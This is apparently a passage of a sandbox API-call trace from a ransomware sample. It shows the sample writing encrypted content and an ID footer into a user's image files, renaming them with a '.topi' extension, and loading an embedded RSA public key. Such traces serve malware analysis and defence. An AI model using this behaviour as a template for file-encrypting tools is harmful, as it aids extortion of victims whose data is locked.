(HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.650] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5cb0) returned 0x99f72d8 [0095.650] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f50 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f98 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.651] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95e8 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d95d0 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.651] GetCurrentThreadId () returned 0x8c4 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f68e0 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.652] GetCurrentThreadId () returned 0x8c4 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9600 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1f98 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x5ca7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x5ca7, lpOverlapped=0x0) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.655] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5cac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.655] CloseHandle (hObject=0x6a8) returned 1 [0095.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.657] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sq-jj8OfS5nH5F.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sq-jj8ofs5nh5f.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sq-jj8OfS5nH5F.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sq-jj8ofs5nh5f.jpg.topi")) returned 1 [0095.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.657] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.658] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f732f20, ftCreationTime.dwHighDateTime=0x1d5be1d, ftLastAccessTime.dwLowDateTime=0x1a209b40, ftLastAccessTime.dwHighDateTime=0x1d5ba67, ftLastWriteTime.dwLowDateTime=0x1a209b40, ftLastWriteTime.dwHighDateTime=0x1d5ba67, nFileSizeHigh=0x0, nFileSizeLow=0x6d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tIB-wQ8HCp.gif", cAlternateFileName="TIB-WQ~1.GIF")) returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.659] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tIB-wQ8HCp.gif") returned=".gif" [0095.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tIB-wQ8HCp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tib-wq8hcp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.659] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=28004) returned 1 [0095.659] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.662] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6d3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.662] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.662] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.662] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6d64, lpOverlapped=0x0) returned 1 [0095.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.663] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.664] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 